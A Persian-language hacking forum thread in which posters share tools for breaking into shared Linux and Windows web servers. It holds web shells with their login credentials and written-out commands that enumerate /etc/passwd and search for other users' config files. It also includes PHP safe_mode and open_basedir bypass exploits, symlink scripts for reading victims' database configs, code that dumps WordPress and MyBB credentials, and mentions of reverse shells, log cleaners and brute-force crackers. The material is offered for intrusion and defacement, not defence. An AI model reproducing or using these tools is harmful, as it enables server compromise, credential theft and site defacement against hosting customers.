با سلام
در این قسمت ابزارهای مفید برای هک کردن سرور ها ( بیشتر لینوکس ) میزاریم heart
از دوستان دیگه هم کسی مایل هست همکاری کنه , بسم اﷲ ../ heart
≈≈≈≈≈≈≈≈≈≈≈≈≈≈
با استفاده از این کد پرل در مواقعی که Wget روی سرور بسته باشه میتونین کارتون رو انجام بدید ( البته از دستور Curl , lwp-download .. هم میتونید استفاده کنید )

یوزر و پسورد دیتابیس رو میدید ( WordPress ) بعد میتونین یک ادمین جدید بسازید

یوزر پسورد دیتابیس رو میدید ( vbulletin ) بعد میتونین InDeX.pHp CaLeNdAr.pHp FaQ.pHp Search.PhP رو فول دیفیس کنین;)

در مواقعی که یوزر پس دیتابیس رو دارید ولی اجازه نمیده وصل بشید از این میتونین استفاده کنین
یا , وقتی که وصل شدید ولی اجازه ( پرم ) نمیده تا چیزی ادیت یا اضافه کنید میتونین از این استفاده کنین
و..

بایپس safe_mode and open_basedir Bypass PHP 5.2.9

شلر c99madshell که یک سری بای پس ها در خودش هم داره
یوزر=ashiyane
پس=ashiyane

یکی از ابزارها برای مس دیفس

دامپر .. SQL Import/Export Tool 1.0

| Tools_hacked by Hussin X|

با این میتونین توی بعضی از سرور ها فایهایی مثل کانفیگ رو بخونید + ایندکس بعضی از Cms ها و.. هم میزنه ( .template )

این فایل رو اپلود کنین و کافی اجرا کنید اگه کانفیگ سرور خوب تنظیم نباشه همه فانکشن ها Off میشه
([Only registered and activated users can see links])

با این چنتا دستور میتونید passwd و COnfig جاهایی که پرم دارید ( حتی phpmyadmin ) رو پیداکنید


cat /etc/passwd lgrep cpanel > 1;cat 1

cut -d: -f 6 1 >2;cat 2

printf %s/public_html\n $(cat 2) >3;cat 3

find $(cat 2) -name config.php >4;cat 4

یوزر پس دیتابیس رو میدید + شلر (vBulletin) و بعد ایشالا میتونید شل بگیرید .

1- دو اسکریپت برای گرفتن شل معکوس .
2- اسکریپت Log Cleaner برای زمانی که خواستیم Log سرور رو پاک کنیم .
3- اسکریپت Backdooring Juniper Firewalls بهمراه توضیحاتش

:x

با این فایل میتونید Passwd و کانفیگ های یوزرهای دیگرو توی سرور بخونید ( بستگی به کانفیگ و.. داره)

شلر AluCaR Shell

ظاهر = R57

DOwnload ([Only registered and activated users can see links])

---

Change All pages For Forum

یوزر پس دیتابیس رو میدید و...

DOwnload ([Only registered and activated users can see links])

یوزر پسورد دیتابیس رومیدید و میتونین Index رو بزنید

برای فروم ها Mybb

DOwnload ([Only registered and activated users can see links])

برای ران کردن کامند (sSh.php)

DOwnload ([Only registered and activated users can see links])

USERS=

root mlook
user muie1234

این فیلم آموزش Bypass به روش Symlink هست

يه شل كه از متد symlink واسه bypass استفاده ميكنه...
وقتي دستور ln كار نداد روي يكسري از سرور ها به خوبي اين كار ميده.
شل دوم هم از متد symlink استفاده ميكنه كه پرل هست...:x

یک ابزار برا mass و یک CMD shell و یک شلر

با سلام
شلر های XML برای vBulletin که میشه این شلرها رو جایگزین کرد و.. آموزشش فکر کنم باشه اینا ابزاراش هست که میشه با اینا از سرور دسترسی گرفت

Hackteach Cpanel-FTP Password brute Force Tools
برای بروت فورس کردنه ../
Perl.
__
Root Script Coded By Dr.$audi
از اسمش معلومه دیگه../;)
.php

Port-Bind
که به زبان C هست ./
__
یک سری دستور که برای پیدا کردن یوزرها و دامین های روی سرور میشه استفاده کرد به شکل های مختلف میشه استفاده کرد./و همچنین اگر دستوری در این رابطه خواصی رو بسته بودند میشه استفاده کرد ( این یکی از روش ها و ساده ترین روش هست )

awk -F: '{ print $1 }' /etc*/passwd | sort
---
awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort
---
cd /etc;cat passwd
--
awk -F":" '{ print "user****: " $1 "\t\tuid:" $3 }' /etc/passwd
--
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
--
less +3 /etc/passwd
lsattr /etc/passwd
more -3 /home/etc/passwd
tar -cvf backup.tar /etc

heart

شلر با امکانات کامل مانند شلر های قبلی ولی به زبان asp.

این تاپیک بیشتر واسه لینوکس بوده چند تا شلر واسه ویندوز هم میزاریم...
شلر aspx که امکاناتی رو داره که کمک زیادی رو واسه bypass سرور ها به شما میکنه.:):x

bypass واسه ورژن های مختلف php:
PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
<!--p
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\", 20);
$MyBoot_readfile = readfile($path."windows\system.ini"); #just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
echo $MyBoot_readfile;
echo "

ionCube output:

";
echo $MyBoot_ioncube;
-->
PHP safe_mode bypass via proc_open() and custom environment
<!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"),
1 =&gt; array("file", $path."/output.txt","w"),
2 =&gt; array("file", $path."/errors.txt", "a" )
);
$cwd = '.';
$env = array('LD_PRELOAD' =&gt; $path."/a.so");
$process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed
sleep(1);
$a=fopen($path."/.comm1","r");
echo "<strong>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
?&gt;;
</strong>
PHP Perl Extension Safe_mode Bypass Exploit
<!--if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$[Only registered and activated users can see links]
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls ';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$per-->eval("system('".$_GET['cmd']."')");
echo "";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "
<form enctype="application/x-[Only registered and activated users can see links]" method="get">CMD:
<input name="cmd" size="25" type="text" value="&quot;.$_GET[" /></form>

"
?&gt;
PHP < 5.2.5 Safe mode Bypass
[Only registered and activated users can see links]
PHP 5.2.6 error_log safe_mode bypass
[Only registered and activated users can see links]
PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)
[Only registered and activated users can see links]
PHP python extension safe_mode Bypass Local Vulnerability
[Only registered and activated users can see links]
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
[Only registered and activated users can see links]

شلر بعدی هم امکانات خوبی داره و aspx هم هست.

سیم لینک ساده ی پرل

#!/usr/bin/perl
# Written By le0n
# GAZA Hacker Team
# Not A complete Script but keep priv8
symlink ("/home/hacker/public_html/forum/includes/config.php","/home/hacker/public_html/f4");
print "Content-type: text/html\\n\\n";
open (THISFILE,"le0n.txt");
foreach $line()
{
print "$line<br>\\n";
}
close (THISFILE);

سیم لینک ساده ی php


<?
/*================*\
|| ########## ||
|| #oM[3]Ga # ||
|| ########## ||
\*================*/
?>
<font color="#FF0000" face="Comic Sans MS">
<title>Symlink By oM[3]Ga</title>
</font><font color="#FF0000"></font>
<p align="center">
<p align="center"><b><font color="#FF0000">Symlink By oM[3]Ga</font></b><p align="center">
<p align="center">
<p align="center">
<p align="center">
<body style="border-style: double; border-width: 3" bgcolor="#000000">

<span lang="ar-sa"><font color="#FFFFFF">

<font color="#0066FF">
<form style="border: 4px ridge #FFFFFF">
</b></font>
</font></span><font color="#FFFFFF">
<td width="50%">
<p><input type="text" name="youruser" value="Your user" size="15"></td><input type="text" name="victimuser" value="Victim user" size="15"></td><input type="text" name="folder" value="Folder your in" size="15"></td><input type="text" name="file" value="vb/includes/config.php" size="20"><tr><td width="50%" colspan="2"><?echo exec('id');?></p>
<p align="center"><input type="submit" value="GET"></td>
</tr>

</p>

</form>

<form style="border: 4px ridge #FFFFFF">
<td width="50%">
<p align="center">

<td width="50%"><select size="1" name="sites"><option value="alias">Sites On Server</option></option></select></td>

<td width="100%" colspan="2">

<input type="submit" value="GET"></td>
</tr>
</p>
</form>
<textarea method='POST' rows=20 cols=100 wrap=off>


<?php


if ($_GET['sites'] )


passthru('ls -al /etc/valiases');




if ($_GET['plugin'] )

for($uid=0;$uid<60000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
if(!empty($_GET['victimuser']) AND !empty($_GET['youruser']) AND !empty($_GET['folder']))
{
$victim=$_GET['victimuser'];
$you=$_GET['youruser'];
$folder=$_GET['folder'];
}

$k = $_GET['file'];

$flib = "omega.txt";

if ($k == "") {
echo "";
die;
}else{
@unlink($flib);
$thefile = "/home/" . $victim . "/public_html/" . $k;
$thefolder = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
@symlink($thefile, $thefolder);
if ($k{0} == "/") {
echo "********** window.location = '" . $flib . "'</script>";
}else{
echo "<pre><xmp>";
echo file_get_contents("[Only registered and activated users can see links]" . $_SERVER['[Only registered and activated users can see links]'] . "/" . $folder . "/" . $flib);
}
}
?>

با سلام
به علت پاکسازی بخش/
تاپیک دوباره ایجاد میشود

اسکریپی به زبان پرل
با سرعت بالا و خیلی قوی کنترل پنل مدیریت سایت را پیدا می کنه
------
اسکریپ لاگین کردن بدونه پسورد در همه ورژن های ویبولتون با دست رسی لوکال
**فیلم اموزشی در قسمت اموزش های تصویری هک

فایل ln که عمل Symlink رو روی سرور ها انجام میده ، خوب این برای زمانی خوبه که رو سرور پرم ln رو بسته باشن و نتونیم اجراش کنیم

اول فایل رو آپلود کنید و بعد پرم 755 برای اجرا بهش بدین و دستور زیر رو اجرا کنین :


./ln -s /home/user/public_html/config.php config.txt

شلر r57 از نوع پرل , مانند telnet.pl heart
همون طور که میدونید پرم فایل رو 755 و برای استفاده در سرور های ویندوز
$unix = 1 رو باید مقدارش رو 0 کنید ;)

یک اسکریپت خوب به صورت local برا کرک FTP & Cpanel

خوب اینم mybb و wp کانفیگ dezender هستش
!
WP:

<?
include('C:\Appserv\[Only registered and activated users can see links]');
$a=DB_NAME;
$b=DB_USER;
$c=DB_PASSWORD;
echo "<b>username:</b>$b</br><b>password:</b>$c</br><b>database:</b>$a";
?>


mybb:

<?
include('C:\Appserv\[Only registered and activated users can see links]');
$a=
$config['database']['database'];
$b=
$config['database']['username'];
$c=$config['database']['password'];
echo "<b>username :</b>$b</br><b>password :</b>$c</br><b>database :</b>$a";
?>